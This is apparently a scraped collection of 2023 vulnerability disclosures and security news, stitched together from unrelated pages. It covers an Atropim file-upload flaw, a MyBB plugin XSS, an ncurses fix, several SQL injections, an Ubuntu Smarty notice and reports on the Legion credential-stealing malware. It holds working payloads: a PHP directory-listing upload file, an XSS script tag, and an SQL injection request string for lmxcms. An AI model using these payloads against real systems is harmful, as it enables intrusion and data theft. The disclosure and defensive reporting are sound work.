Atropim 1.5.26 is vulnerable to Directory Traversal.

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**Latest commit**

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

**atropim-1.5.26-Unauthenticated-File-Upload-RCE - Directory Traversal****Vendor**

**Description:**

The Create Import Feed option with glyphicon-glyphicon-paperclip - format CSV upload function appears to be vulnerable to User interaction - Unauthenticated File upload - RCE attacks. The attacker can easily upload a malicious file then can execute the file remotely and can get VERY sensitive information about the configuration of this system, after this he can perform a very nasty attack.

STATUS: HIGH Vulnerability CRITICAL

\[+\]Exploit:

<?php
// by nu11secur1ty - 2023
$dir = "/var/www/";
$ascending\_order = scandir($dir);
$descending\_order = scandir($dir,1);

print\_r($ascending\_order);
print\_r($descending\_order);
?>

**Reproduce:**

href

**Reference:**

href

**Reference:**

href

**Proof and Exploit:**

href

**Time spend:**

00:15:00

CVE-2023-26969: CVE-nu11secur1ty/vendors/atrocore/atrocore-1.5.26 at main · nu11secur1ty/CVE-nu11secur1ty

** UNSUPPORTED WHEN ASSIGNED ** The Export User plugin through 2.0 for MyBB allows XSS during the process of an admin generating DSGVO data for a user, via the Custom User Title, Location, or Bio field. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

    # Exploit Title: MyBB Export User Plugin 2.0 – Cross-Site Scripting# Date: January 29, 2021# Author: 0xB9# Twitter: @0xB9sec# Software Link: https://community.mybb.com/mods.php?action=view&pid=1408# Version: 2.0# Tested On: Windows 10# CVE: CVE-2023-27890Description:This plugin allows users to request their data to export. XSS occurs when admin is generating data for user.Proof of Concept:– As a regular user go to User CP -> Edit Profile– Add a payload in Custom User Title, Location, or Bio <script>alert(1)</script>– Request your data via User CP -> DSGVO data request– Login as admin you will be notified a user wants their data– When generating the users data their payload will execute

CVE-2023-27890: MyBB Export User 2.0 Cross Site Scripting ≈ Packet Storm

ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[<thread-prev\] \[day\] \[month\] \[year\] \[list\]

Date: Thu, 13 Apr 2023 13:33:56 -0500
From: Mark Esler <mark.esler@...onical.com>
To: oss-security@...ts.openwall.com
Subject: Re: ncurses fixes upstream

On 4/12/23 15:40, Jonathan Bar Or (JBO) wrote:

> Hello oss-security,
>
> Our team has worked with the maintainer of the ncurses library (used by several software packages in Linux) to fix several memory corruption vulnerabilities.
> They are now fixed at commit 20230408 - see details here (https://invisible-island.net/ncurses/NEWS.html#index-t20230408)
> A CVE was assigned (CVE-2023-29491) - it's still under a "reserved" status.
>
> How can we ensure those fixes get deployed upstream, in major Linux distributions?

(distros maintain "downstream" versions of the ncurses "upstream")

Ideally, a security patch should only include security relevant changes. 
If a bunch of a documentation or miscellaneous changes are added, it 
makes backporting difficult (i.e., the non-security relevant changes may 
not be desired or cause the patch to not apply cleanly to old versions 
of ncurses). The upstream patch is already made, but that's what I'd 
recommend for future patches. If there's a regression as Alice suggests, 
that might be a good opportunity to redo the patch format.

http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56

When you publish the CVE json5, you can references the patch URL and 
relevant bug discussions to help downstream. Including the CVE number in 
the patch commit is also quite helpful.

Thank you!

> We've reached out to Arch, RedHat, Canonical and other popular distros independently.
Which email did you contact Canonical with? I cannot find anything 
recent for ncurses on security@...ntu.com
>
> Thanks!
>                               JBO
>
>

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2023-29491: security - Re: ncurses fixes upstream

Auto Dealer Management System v1.0 was discovered to contain a SQL injection vulnerability.

\[CVE ID\]

CVE-2023-27667

\[PRODUCT\]

Auto Dealer Management System - v 1.0

\[VERSION\]

Auto Dealer Management System - v 1.0

\[PROBLEM TYPE\]

SQL Injection

\[DESCRIPTION\]

SQL Injection on page view\_car\_type.php and parameter is id, application url is (/view\_car\_type.php?id=?)

Can be called without authorized access.

CVE-2023-27667: CVE-2023-27667

Ubuntu Security Notice 6012-1 - It was discovered that Smarty incorrectly parsed blocks' names and included files' names. A remote attacker with template writing permissions could use this issue to execute arbitrary PHP code.

==========================================================================  
Ubuntu Security Notice USN-6012-1  
April 13, 2023

smarty3 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS

Summary:

Smarty could be made to crash or run programs if it received a specially  
crafted template.

Software Description:  
- smarty3: The compiling PHP template engine

Details:

It was discovered that Smarty incorrectly parsed blocks' names and  
included files' names. A remote attacker with template writing permissions  
could use this issue to execute arbitrary PHP code. (CVE-2022-29221)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   smarty3                         3.1.39-2ubuntu1.22.10.1

Ubuntu 22.04 LTS:  
   smarty3                         3.1.39-2ubuntu1.22.04.1

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-6012-1  
   CVE-2022-29221

Package Information:  
https://launchpad.net/ubuntu/+source/smarty3/3.1.39-2ubuntu1.22.10.1  
https://launchpad.net/ubuntu/+source/smarty3/3.1.39-2ubuntu1.22.04.1

Ubuntu Security Notice USN-6012-1

A novel credential harvester compromises SMTP services to steal data from a range of hosted services and providers, and can also launch SMS-based spam attacks against devices using US mobile carriers.

Threat actors are selling a novel credential harvester and hacktool via a Telegram channel, which can exploit numerous Web-based services to steal credentials. It also has the bonus ability to launch SMS-based spam attacks that target US-based mobile devices as well, the researchers have found.

Researchers from Cado Security uncovered the Python-based credential stealer, called Legion, which has links to both the AndroxGh0st malware family and another previously discovered malware, they revealed in a blog post published today.

Legion's primary means of attack is to compromise misconfigured Web servers running content management systems (CMS), PHP, or PHP-based frameworks, such as Laravel, the researchers noted. Once installed, it contains several methods for retrieving credentials from the servers: by targeting the Web server software itself, scripting languages, or frameworks on which the server is running. The malware attempts to request resources from these known to contain secrets, parses them, and saves the secrets into results files sorted on a per-service basis, the researchers said.

"One such resource is the .env environment variables file, which often contains application-specific secrets for Laravel and other PHP-based Web applications," wrote Matt Muir, threat intelligence researcher at Cado Security, in the analysis. "The malware maintains a list of likely paths to this file, as well as similar files and directories for other Web technologies."

Legion then marches on to steal credentials from myriad Web-based sources and services —such as email providers, cloud service providers, server-management systems, databases, and payment platforms like Stripe and PayPal, the researchers said. And Legion can brute-force credentials to Amazon Web Services (AWS), which is consistent with similar functionality in AndroxGh0st, according to analysis of that malware by researchers at Lacework, Muir said. 

In addition to credential theft, Legion includes traditional hacktool functionality that can exploit well-known PHP vulnerabilities to register a Webshell or remotely execute malicious code, Muir tells Dark Reading.

"It is an SMTP abuse tool primarily, but it relies on opportunistic exploitation of misconfigured Web services to harvest credentials for said abuse," he says. "It also bundles additional functionality traditionally found in more common hacktools, such as the ability to execute Web-server-specific exploit code and brute force account credentials."

As mentioned, one unique aspect of the malware is that along with stealing credentials and general hacking, it also can automatically send SMS spam messages to mobile network users based in the United States, including subscribers to AT&T, Boost Mobile, Cingular, Sprint, Verizon, and more. This feature is one not often, if ever, seen in a credential harvester, the researchers noted.

This function is fairly basic: It retrieves the area code from the website www.randomphonenumbers.com, then tries different combinations of numbers to find a workable phone number.

"To retrieve the area code, Legion uses Python's BeautifulSoup HTML parsing library," Muir wrote. "A rudimentary number generator function is then used to build up a list of phone numbers to target."

To send the SMS messages themselves, the malware checks for saved SMTP credentials retrieved by one of the credential-harvesting modules, he added.

**Widespread Malware Distribution via Telegram**

A public Telegram group with more than 1,000 members to which Cado researchers gained access is distributing Legion, which also has a dedicated YouTube channel containing tutorial videos on the malware, the researchers said.

The malware is also being advertised by other Telegram groups to reach about 5,000 users in total. These combined factors indicate that Legion already has a loyal following and is likely a for-purchase offering under a perpetual license model, Muir said.

"While not every member will have purchased a license for Legion, these numbers show that interest in such a tool is high," he wrote in the post. "Related research indicates that there are a number of variants of this malware, likely with their own distribution channels."

While the researchers have not identified the definitive source of Legion, several Indonesian-language comments on the YouTube channel suggest that the developer may be Indonesian or based in Indonesia, and references to user with the handle "my13gion" in the Telegram group also offer clues to its source, they said.

Moreover, in a function dedicated to PHP exploitation, a link to a GitHub Gist leads to a user named Galeh Rizky, with a profile suggesting that this user is located in Indonesia. Still, it's not clear if Rizky is the developer behind Legion, or if his code just happens to be found in the sample analyzed by Cado, the researchers said.

**How to Mitigate & Assess Legion's Cyber-Risk**

Researchers included a list of indicators of compromise (IoCs), as well as a list of targeted US mobile carriers in the blog post to help organizations or device users know if they've been compromised by Legion or could be a target of the malware, respectively.

Given the malware's reliance on misconfigurations in Web servers or frameworks to access systems, Cado recommends that organizations and other users of these technologies review existing security processes and ensure that secrets are appropriately stored. Moreover, if credentials are stored in a .env file, this file should be outside Web server directories so that it's inaccessible from the Web, the researchers said.

Organizations using cloud providers such as AWS and Microsoft Azure should also keep in mind their shared-responsibility obligations under the terms of use for those platforms to ensure their Web servers are configured properly, Muir says. A compromise by the malware "would likely fall under the user's remit in a shared responsibility context," he says.

Additionally, AWS users should also be aware of Legion's targeting of the platform's identity access management (IAM) and simple email service (SES) in its attempt to gain AWS credentials. To mitigate this risk, organizations should look out for user accounts that show a change in the IAM user registration code to include an "Owner" tag with the hardcoded value "ms.boharas," which is a hallmark of the malware, the researchers said.

Legion Malware Marches onto Web Servers to Steal Credentials, Spam Mobile Users

By Waqas
The Legion malware is capable of stealing credentials from misconfigured or exposed servers and is linked to the AndroxGh0st malware family.
This is a post from HackRead.com Read the original post: Legion: Credential Harvesting & SMS Hijacking Malware Sold on Telegram

**The new Python-based Legion malware is being linked to a potential Indonesian developer.**

Cloud forensics and incident response platform startup, Cado Security Ltd., has revealed details of a new credential harvester and hacking tool called “Legion.”

According to researchers, Legion is being sold on Telegram and is designed to exploit various services for email abuse. The tool is believed to be linked to the AndroxGh0st malware family which was first reported in December 2022.

The use of Telegram for selling Legion malware should not come as a surprise, as the popular messaging platform has often been associated with illegal activities. In fact, just last week, **it was reported** that threat actors are leveraging Telegram to automate phishing attacks, highlighting the platform’s role in facilitating cybercriminal activities.

Legion specifically targets web servers running content management systems, PHP or PHP-based frameworks. It has the ability to retrieve credentials for a wide range of web services, including email providers, cloud service providers, server management systems, databases, and payment platforms like Stripe Inc. and PayPal Holdings Inc. Additionally, Legion can hijack SMS messages and compromise Amazon Web Services Inc. credentials.

One notable feature of Legion is its availability of modules that can enumerate vulnerable SMTP servers, conduct remote code execution, exploit vulnerable versions of Apache, and brute-force cPanel and WebHost Manager accounts.

It also interacts with the **Shodan Search Engine**‘s API to retrieve a target list and has modules focused on abusing AWS services. Researchers have also highlighted Legion’s ability to send SMS spam messages to mobile network users in the United States across all carriers, which sets it apart from other similar tools.

Legion is being sold on various Telegram channels and is being promoted on YouTube through tutorial videos, suggesting that it is widely distributed and likely paid malware.

While the origin of the malware is not confirmed, comments found in Bahasa Indonesia suggest that the developer may be Indonesian or based in Indonesia. A GitHub Gist link leads to a user named “Galeh Rizky” with a profile indicating residence in Indonesia.

As a precaution, Cado Security researchers recommend in their **report** that users of web server technologies and frameworks like Laravel review their existing security processes and ensure that credentials are appropriately stored.

Ideally, sensitive information such as credentials should be stored in a .env file outside of web server directories to prevent unauthorized access.

Legion splash screen (Cado Labs)

The discovery of Legion highlights the ongoing threat of credential harvesting and hacking tools in the cybersecurity landscape. It serves as a reminder for organizations to prioritize robust security measures and stay vigilant against evolving cyber threats.

On the other hand, the trend of using Telegram as a platform for buying and selling malware is concerning, as it provides a convenient and anonymous means for cybercriminals to conduct illicit activities.

1.  360 Million WhatsApp Records Leaked on Telegram
2.  Hackers turn to Telegram to assist Iranian protestors
3.  Telegram and Discord Bots Drop Infostealing Malware
4.  Fake Telegram and WhatsApp clones steal crypto funds
5.  21M SuperVPN, GeckoVPN user data leaked on Telegram

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Legion: Credential Harvesting & SMS Hijacking Malware Sold on Telegram

bloofox v0.5.2 was discovered to contain an arbitrary file deletion vulnerability via the delete_file() function.

**Welcome to bloofoxCMS**

  
bloofoxCMS is a free open source content management system (CMS). bloofoxCMS is a small and easy to use CMS. It enables you to manage websites and intranet sites on a very simple way. It is slim but also flexible. You may use and download it **free of charge** without any limitations. But it would be a great pleasure to receive a small donation.

  
\[ Features \] \[ Download \]

**bloofoxCMS Key Features**

  

Very **easy installation** over web browser by using an automated install process with only 2 steps. If you prefer a manual setup just use our SQL dump files.

**Easy to use admin panel** with structured areas. You need only a short training period. The Admincenter includes an intuitive user interface.

More simply and fast expandable program code also for PHP beginners. Every php developer is able to extend the code with additional individual code lines.

Fast customization und creation of individual template designs with HTML or XHTML and CSS (cascading stylesheets). Our **templates are completely free of PHP code**. Even web designers without PHP knowledge can create templates.

   

  
**Latest News**

bloofoxCMS 0.5.2.1 available

Read more

bloofoxCMS 0.5.1 available

Read more

bloofoxCMS now available on github

Read more

**Make a donation**

You may help us by making a little donation. Please click the image beside. Thanks for your support!

CVE-2023-27812: bloofoxCMS - Home

lmxcms v1.4.1 was discovered to contain a SQL injection vulnerability via the setbook parameter at index.php.

This is the message page of the front desk  

Find the back-end code through the front page. The ischeck is to judge whether the content of the message is displayed on the page. There are several key functions in the picture.  
Function call flow:  
index() calls checkDate()  
checkDate() calls the filter\_strs($\_POST) function to filter strings  
checkDate() calls the p() function again to prevent injection  
The p() function calls the filter\_sql() function to filter the reserved characters of mysql to prevent injection  
Then index() continues execution and calls the add() function  
The add() function calls the addModel() function in turn  
addModel() function and then addDB() function  
$sql in the addDB() function is an insert statement, where the value of $value comes from $data, and the value of $date is a parameter we can control.  
  
  
  
  
  
  

Add echo $sql to output complete sql statement, which is convenient for constructing payload.  

Packet analysis  

After inserting the page, the message will not be displayed, only when ischeck=1 will it be displayed in the foreground  
  

There are a lot of filtering functions in the previous code, but I found that these filtering functions only filter the 'value' in the array $data, but not the 'key', and the front page will echo only when ischeck=1 , so construct the payload and close the INSERT statement.  
payload: name=x&mail=x&tel=x&content=x&setbook=%E6%8F%90%E4%BA%A4&ischeck=1&time)VALUES(user(),1,1,1,1,1,1);#=1  
  

Protection Advice  
Filter the keys in the array as well

CVE-2023-29598: lmxcms v1.4.1 Front page sql injection · Issue #3 · jspring996/PHPcodecms

bloofox v0.5.2 was discovered to contain a SQL injection vulnerability via the component /index.php?mode=content&page=pages&action=edit&eid=1.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Tag

#php